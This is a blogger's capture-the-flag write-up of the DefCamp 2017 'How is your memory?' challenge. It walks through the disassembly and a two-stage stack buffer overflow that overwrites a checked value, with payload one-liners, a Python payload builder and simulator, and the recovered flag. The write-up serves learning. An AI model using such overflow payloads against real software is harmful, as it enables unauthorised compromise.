Trying my first write-up

I've been busy lately with my job-offer ceremony and my graduation research and haven't managed to do anything, so here is my first write-up!!

This is a write-up of a challenge from DefCamp CTF Qualification 2017, which I played with my team the other day.

How is your memory?

Downloading the file from the challenge gave me memory.pcap.
Since it was a pcap I opened it in Wireshark, but I could see the string "ELF" in it, so I checked it with file:

$ file memory.pcap
memory.pcap: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=ffa14db28a5fdf190ee6b0b56af2c7b2cab9cdd5, not stripped

It was an ELF...

Let's just run it.

$ ./memory.pcap 


Oh well you do remember your extension!

[You have sent this msg]: 

[Instead of 0xdeadbeef the target recived]: 0x4030201

With no input it looks like this.
Next, let's give it some input.

$ ./memory.pcap 
AAAAAAAAAAA

Oh well you do remember your extension!

[You have sent this msg]: AAAAAAAAAAA

[Instead of 0xdeadbeef the target recived]: 0x4030201

My input was echoed back.
Let's feed it more.

$ ./memory.pcap 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Oh well you do remember your extension!

[You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[Instead of 0xdeadbeef the target recived]: 0x41414141

Hey hey do not spam! Go home you are drunk!

What used to be 0x4030201 has become 0x41414141, so that value was overwritten by my input. Note also that only part of what I typed was echoed back, so the read is length-limited.

Next, let's look at the internals.

$ gdb -q ./memory.pcap 
Reading symbols from ./memory.pcap...(no debugging symbols found)...done.
gdb-peda$ disas main
Dump of assembler code for function main:
   0x080486bb <+0>:   lea    ecx,[esp+0x4]
   0x080486bf <+4>:   and    esp,0xfffffff0
   0x080486c2 <+7>:   push   DWORD PTR [ecx-0x4]
   0x080486c5 <+10>:  push   ebp
   0x080486c6 <+11>:  mov    ebp,esp
   0x080486c8 <+13>:  push   ecx
   0x080486c9 <+14>:  sub    esp,0x64
   0x080486cc <+17>:  mov    DWORD PTR [ebp-0xc],0x4030201
   0x080486d3 <+24>:  mov    eax,ds:0x804a040
   0x080486d8 <+29>:  sub    esp,0x4
   0x080486db <+32>:  push   eax
   0x080486dc <+33>:  push   0x2d
   0x080486de <+35>:  lea    eax,[ebp-0x34]
   0x080486e1 <+38>:  push   eax
   0x080486e2 <+39>:  call   0x80484f0 <fgets@plt>
   0x080486e7 <+44>:  add    esp,0x10
   0x080486ea <+47>:  sub    esp,0xc
   0x080486ed <+50>:  push   0x8048950
   0x080486f2 <+55>:  call   0x8048540 <puts@plt>
   0x080486f7 <+60>:  add    esp,0x10
   0x080486fa <+63>:  sub    esp,0x8
   0x080486fd <+66>:  lea    eax,[ebp-0x34]
   0x08048700 <+69>:  push   eax
   0x08048701 <+70>:  push   0x804897c
   0x08048706 <+75>:  call   0x8048530 <printf@plt>
   0x0804870b <+80>:  add    esp,0x10
   0x0804870e <+83>:  sub    esp,0x8
   0x08048711 <+86>:  push   DWORD PTR [ebp-0xc]
   0x08048714 <+89>:  push   0x804899c
   0x08048719 <+94>:  call   0x8048530 <printf@plt>
   0x0804871e <+99>:  add    esp,0x10
   0x08048721 <+102>: cmp    DWORD PTR [ebp-0xc],0x4030201
   0x08048728 <+109>: je     0x8048743 <main+136>
   0x0804872a <+111>: cmp    DWORD PTR [ebp-0xc],0xdeadbeef
   0x08048731 <+118>: je     0x8048743 <main+136>
   0x08048733 <+120>: sub    esp,0xc
   0x08048736 <+123>: push   0x80489cc
   0x0804873b <+128>: call   0x8048540 <puts@plt>
   0x08048740 <+133>: add    esp,0x10
   0x08048743 <+136>: cmp    DWORD PTR [ebp-0xc],0xdeadbeef
   0x0804874a <+143>: jne    0x8048865 <main+426>
   0x08048750 <+149>: sub    esp,0xc
   0x08048753 <+152>: push   0x80489fc
   0x08048758 <+157>: call   0x8048530 <printf@plt>
   0x0804875d <+162>: add    esp,0x10
   0x08048760 <+165>: mov    DWORD PTR [ebp-0xc],0xffffff
   0x08048767 <+172>: sub    esp,0x8
   0x0804876a <+175>: lea    eax,[ebp-0x34]
   0x0804876d <+178>: push   eax
   0x0804876e <+179>: push   0x8048a64
   0x08048773 <+184>: call   0x8048520 <scanf@plt>
   0x08048778 <+189>: add    esp,0x10
   0x0804877b <+192>: sub    esp,0x8
   0x0804877e <+195>: lea    eax,[ebp-0x34]
   0x08048781 <+198>: push   eax
   0x08048782 <+199>: push   0x804897c
   0x08048787 <+204>: call   0x8048530 <printf@plt>
   0x0804878c <+209>: add    esp,0x10
   0x0804878f <+212>: sub    esp,0x8
   0x08048792 <+215>: push   DWORD PTR [ebp-0xc]
   0x08048795 <+218>: push   0x8048a68
   0x0804879a <+223>: call   0x8048530 <printf@plt>
   0x0804879f <+228>: add    esp,0x10
   0x080487a2 <+231>: cmp    DWORD PTR [ebp-0xc],0xffffff
   0x080487a9 <+238>: je     0x80487c4 <main+265>
   0x080487ab <+240>: cmp    DWORD PTR [ebp-0xc],0x41414242
   0x080487b2 <+247>: je     0x80487c4 <main+265>
   0x080487b4 <+249>: sub    esp,0xc
   0x080487b7 <+252>: push   0x80489cc
   0x080487bc <+257>: call   0x8048540 <puts@plt>
   0x080487c1 <+262>: add    esp,0x10
   0x080487c4 <+265>: cmp    DWORD PTR [ebp-0xc],0x41414242
   0x080487cb <+272>: jne    0x8048865 <main+426>
   0x080487d1 <+278>: mov    DWORD PTR [ebp-0x3e],0x33736461
   0x080487d8 <+285>: mov    DWORD PTR [ebp-0x3a],0x73647177
   0x080487df <+292>: mov    WORD PTR [ebp-0x36],0x78
   0x080487e5 <+298>: mov    DWORD PTR [ebp-0x43],0x46544344
   0x080487ec <+305>: mov    BYTE PTR [ebp-0x3f],0x0
   0x080487f0 <+309>: mov    DWORD PTR [ebp-0x47],0x414853
   0x080487f7 <+316>: mov    DWORD PTR [ebp-0x4b],0x363532
   0x080487fe <+323>: mov    DWORD PTR [ebp-0x5b],0x2168654d
   0x08048805 <+330>: mov    DWORD PTR [ebp-0x57],0x756f5920
   0x0804880c <+337>: mov    DWORD PTR [ebp-0x53],0x61676120
   0x08048813 <+344>: mov    DWORD PTR [ebp-0x4f],0x3f6e69
   0x0804881a <+351>: sub    esp,0xc
   0x0804881d <+354>: push   0x8048a98
   0x08048822 <+359>: call   0x8048540 <puts@plt>
   0x08048827 <+364>: add    esp,0x10
   0x0804882a <+367>: sub    esp,0x4
   0x0804882d <+370>: push   0x8048ac3
   0x08048832 <+375>: lea    eax,[ebp-0x4b]
   0x08048835 <+378>: push   eax
   0x08048836 <+379>: lea    eax,[ebp-0x43]
   0x08048839 <+382>: push   eax
   0x0804883a <+383>: push   0x8048ad1
   0x0804883f <+388>: lea    eax,[ebp-0x3e]
   0x08048842 <+391>: push   eax
   0x08048843 <+392>: push   0x8048ad8
   0x08048848 <+397>: lea    eax,[ebp-0x3e]
   0x0804884b <+400>: push   eax
   0x0804884c <+401>: lea    eax,[ebp-0x4b]
   0x0804884f <+404>: push   eax
   0x08048850 <+405>: lea    eax,[ebp-0x47]
   0x08048853 <+408>: push   eax
   0x08048854 <+409>: lea    eax,[ebp-0x43]
   0x08048857 <+412>: push   eax
   0x08048858 <+413>: push   0x8048adb
   0x0804885d <+418>: call   0x8048530 <printf@plt>
   0x08048862 <+423>: add    esp,0x30
   0x08048865 <+426>: mov    eax,0x0
   0x0804886a <+431>: mov    ecx,DWORD PTR [ebp-0x4]
   0x0804886d <+434>: leave  
   0x0804886e <+435>: lea    esp,[ecx-0x4]
   0x08048871 <+438>: ret

Looking at this part: fgets at main+39 reads up to 0x2d (45) bytes, i.e. 44 characters, into the buffer at [ebp-0x34], while the checked dword at [ebp-0xc] lies 0x34 - 0xc = 40 bytes after the start of that buffer, so characters 41 to 44 of the input overwrite it. If the value is neither the initial 0x4030201 nor 0xdeadbeef the program prints "Hey hey do not spam! Go home you are drunk!", and if it is anything other than 0xdeadbeef the jne at main+143 skips straight to the end of main. So 40 bytes of filler followed by 0xdeadbeef (little-endian, ef be ad de) should get past this check.

 0x08048721 <+102>:    cmp    DWORD PTR [ebp-0xc],0x4030201
   0x08048728 <+109>: je     0x8048743 <main+136>
   0x0804872a <+111>: cmp    DWORD PTR [ebp-0xc],0xdeadbeef
   0x08048731 <+118>: je     0x8048743 <main+136>
   0x08048733 <+120>: sub    esp,0xc
   0x08048736 <+123>: push   0x80489cc
   0x0804873b <+128>: call   0x8048540 <puts@plt>
   0x08048740 <+133>: add    esp,0x10
   0x08048743 <+136>: cmp    DWORD PTR [ebp-0xc],0xdeadbeef
   0x0804874a <+143>: jne    0x8048865 <main+426>

Let's try it. (The one-liners below rely on Python 2, where "\xef\xbe\xad\xde" is a raw byte string; under Python 3, print would UTF-8-encode those characters and the overwrite would miss.)

$ python -c 'print("A"*40 + "\xef\xbe\xad\xde")' | ./memory.pcap

Oh well you do remember your extension!

[You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAᆳ�
[Instead of 0xdeadbeef the target recived]: 0xdeadbeef
Meh...you did it... but I am not sure you know what you did there... Again, is your memory good enough?
[You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���
[Instead of 0x41414242 the target recived]: 0xffffff

Overwriting it with 0xdeadbeef got me through.
Once that check passes, main+165 sets [ebp-0xc] to 0xffffff, main+184 reads into the same buffer at [ebp-0x34] with scanf (the format string at 0x8048a64 is not in the dump, but it behaves like an unbounded %s), and main+265 requires the dword to be 0x41414242. Same layout, so the next step is 40 bytes of filler plus 0x41414242 little-endian, which is the bytes "BBAA". Since fgets stops after exactly 44 characters, the second stage can simply be appended to the first and scanf picks up where fgets left off.

$ python -c 'print("A"*40 + "\xef\xbe\xad\xde" + "A"*40 + "\x42\x42\x41\x41")' | ./memory.pcap

Oh well you do remember your extension!

[You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAᆳ�
[Instead of 0xdeadbeef the target recived]: 0xdeadbeef
Meh...you did it... but I am not sure you know what you did there... Again, is your memory good enough?
[You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAA
[Instead of 0x41414242 the target recived]: 0x41414242
Wow I am impressed! Now for the last time:
DCTF{SHA256(ads3wqdsx<>ads3wqdsxprintfDCTF256mehgeneration)}

Something that looks like a flag came out. The pieces inside the parentheses are the strings main builds on the stack with the mov immediates at main+278 to main+344 (read little-endian, 0x33736461 0x73647177 0x78 spell "ads3wqdsx", 0x46544344 is "DCTF", 0x414853 is "SHA" and 0x363532 is "256"), interleaved with literals from .rodata by the printf at main+418.
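To make the two-stage overwrite reproducible without Python 2, here is an added example (written for this write-up, not part of the original post or the challenge files): a payload builder that uses the offsets from the disassembly, plus a toy model of main's two reads that replays the checks on a payload. The model is a simplification: Frame holds only the 40-byte buffer and the checked dword, c_fgets mirrors fgets's size-1 limit, and c_scanf_s assumes the scanf format is "%s", which the dump does not show.

```python
"""Payload builder plus a toy model of main()'s two reads, derived from the disassembly.

Offsets come from the dump: fgets/scanf write to [ebp-0x34], the compared dword is at
[ebp-0xc], and fgets is called with size 0x2d. Frame, c_fgets and c_scanf_s are
simplified models written for this example; scanf's format is assumed to be "%s".
"""
import io
import struct
import sys

BUF_DISP = 0x34                       # lea eax,[ebp-0x34]: start of the input buffer
TARGET_DISP = 0x0c                    # [ebp-0xc]: the dword the program compares
DISTANCE = BUF_DISP - TARGET_DISP     # 40 bytes from buffer start to the target
FGETS_SIZE = 0x2d                     # fgets(buf, 0x2d, stdin): at most 44 characters

STAGE1_VALUE = 0xdeadbeef             # cmp DWORD PTR [ebp-0xc],0xdeadbeef
STAGE2_VALUE = 0x41414242             # cmp DWORD PTR [ebp-0xc],0x41414242


def stage_payload(value, filler=b"A"):
    """40 bytes of filler to reach [ebp-0xc], then the wanted dword in little-endian."""
    return filler * DISTANCE + struct.pack("<I", value)


def build_payload():
    """Both stages back to back: fgets stops after exactly 44 bytes, scanf reads the rest."""
    return stage_payload(STAGE1_VALUE) + stage_payload(STAGE2_VALUE) + b"\n"


def naive_py3_payload():
    # What python3 -c 'print("A"*40 + "\xef\xbe\xad\xde")' really emits: UTF-8 text, 8 bytes
    # for the four "raw" characters, so the dword lands in the wrong place.
    return ("A" * 40 + "\xef\xbe\xad\xde").encode("utf-8") + b"\n"


def c_fgets(stream, size):
    """Model of fgets(buf, size, stdin): at most size-1 bytes, stops after a newline, adds NUL."""
    out = bytearray()
    while len(out) < size - 1:
        c = stream.read(1)
        if not c:
            break
        out += c
        if c == b"\n":
            break
    return bytes(out) + b"\x00"


def c_scanf_s(stream):
    """Model of scanf("%s", buf) (assumed format): skip whitespace, copy until whitespace or EOF, unbounded."""
    out = bytearray()
    c = stream.read(1)
    while c and c.isspace():
        c = stream.read(1)
    while c and not c.isspace():
        out += c
        c = stream.read(1)
    return bytes(out) + b"\x00"


class Frame:
    """Toy stack frame: the 40-byte buffer followed by the checked dword, plus slack for the NUL."""

    def __init__(self, initial):
        self.mem = bytearray(DISTANCE + 4 + 4)
        self.set_target(initial)

    def set_target(self, value):
        self.mem[DISTANCE:DISTANCE + 4] = struct.pack("<I", value)

    def target(self):
        return struct.unpack("<I", bytes(self.mem[DISTANCE:DISTANCE + 4]))[0]

    def write(self, data):
        # Unchecked copy starting at buf[0]: anything past 40 bytes lands on the target.
        self.mem[:len(data)] = data


def simulate(payload):
    """Replay main()'s checks on a payload; returns (value after fgets, value after scanf or None)."""
    stream = io.BytesIO(payload)
    frame = Frame(0x4030201)                  # mov DWORD PTR [ebp-0xc],0x4030201
    frame.write(c_fgets(stream, FGETS_SIZE))
    first = frame.target()
    if first != STAGE1_VALUE:                 # jne main+426: program leaves main
        return first, None
    frame.set_target(0xffffff)                # mov DWORD PTR [ebp-0xc],0xffffff
    frame.write(c_scanf_s(stream))
    return first, frame.target()


if __name__ == "__main__":
    # Usage: python3 exploit.py | ./memory.pcap  (raw bytes, so this works on Python 3)
    sys.stdout.buffer.write(build_payload())
```

Writing to sys.stdout.buffer is what keeps the 0xef 0xbe 0xad 0xde bytes intact; simulate(naive_py3_payload()) shows what the UTF-8 version would have put in [ebp-0xc] instead, and simulate(stage_payload(0xdeadbeef) + b"\n") reproduces the 0xffffff seen in the first run, where scanf only found the newline.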

$ echo -n "ads3wqdsx<>ads3wqdsxprintfDCTF256mehgeneration" | sha256sum

Since the format was DCTF{SHA256(...)}, the digest this prints, wrapped in DCTF{...}, is the flag (the -n matters: a trailing newline would give a different digest).

DCTF{33886bb08d43834495866481148c60bbf9b58421d1dd4849865e49fe444366c6}
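The stack-built strings can also be recovered statically, without running the binary. The following is an added example written for this write-up (not the author's code): it replays the mov immediates from main+278 to main+344 into a byte image of the frame and reads the C strings back out, then applies the same SHA256 wrapping as the echo | sha256sum step. The (size, displacement, immediate) triples are copied from the disassembly; the .rodata strings the same printf receives (0x8048ad1, 0x8048ad8, 0x8048ac3 and the format at 0x8048adb) are not in the dump, so only the stack pieces are reconstructed.

```python
"""Recover the strings main() assembles on the stack with mov immediates (main+278..main+344).

Triples are (operand size in bytes, displacement below ebp, immediate), copied from the
disassembly. Example code written for this write-up.
"""
import hashlib
import struct

STACK_MOVS = [
    (4, 0x3e, 0x33736461),  # mov DWORD PTR [ebp-0x3e],0x33736461
    (4, 0x3a, 0x73647177),
    (2, 0x36, 0x78),        # mov WORD PTR [ebp-0x36],0x78
    (4, 0x43, 0x46544344),
    (1, 0x3f, 0x0),         # mov BYTE PTR [ebp-0x3f],0x0 terminates "DCTF"
    (4, 0x47, 0x414853),
    (4, 0x4b, 0x363532),
    (4, 0x5b, 0x2168654d),
    (4, 0x57, 0x756f5920),
    (4, 0x53, 0x61676120),
    (4, 0x4f, 0x3f6e69),
]

PACK_FMT = {1: "<B", 2: "<H", 4: "<I"}  # x86 is little-endian: low byte goes to the low address


def rebuild_stack(movs):
    """Replay the stores in program order into a byte image; index 0 is the deepest slot written."""
    base = max(disp for _, disp, _ in movs)                # e.g. [ebp-0x5b]
    end = max(base - disp + size for size, disp, _ in movs)
    image = bytearray(end)
    for size, disp, imm in movs:
        pos = base - disp
        image[pos:pos + size] = struct.pack(PACK_FMT[size], imm)
    return base, bytes(image)


def cstring_at(image, base, disp):
    """Read the NUL-terminated string that starts at [ebp-disp] from the rebuilt image."""
    pos = base - disp
    return image[pos:image.index(b"\x00", pos)].decode("ascii")


def stack_strings():
    """Stack strings keyed by displacement. 0x43, 0x47, 0x4b and 0x3e are pushed to the final
    printf; 0x5b is stored by main+323..main+344 but never pushed in the dumped code."""
    base, image = rebuild_stack(STACK_MOVS)
    return {disp: cstring_at(image, base, disp) for disp in (0x43, 0x47, 0x4b, 0x3e, 0x5b)}


def flag_for(preimage):
    """DCTF{SHA256(...)}: hex digest of the printed preimage, with no trailing newline."""
    return "DCTF{" + hashlib.sha256(preimage.encode("ascii")).hexdigest() + "}"


if __name__ == "__main__":
    for disp, s in sorted(stack_strings().items()):
        print("[ebp-0x%02x] = %r" % (disp, s))
    print(flag_for("ads3wqdsx<>ads3wqdsxprintfDCTF256mehgeneration"))
```

Replaying the stores in program order matters when a later store overlaps an earlier one, as the single NUL byte at [ebp-0x3f] does here; reading each mov in isolation would miss that "DCTF" is terminated separately from "ads3wqdsx".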

It's been just about a month since I started doing CTFs seriously, and everyone on the team is amazing, so I want to catch up as fast as I can...
We play a competition together every week, so I plan to write more!!!
See you!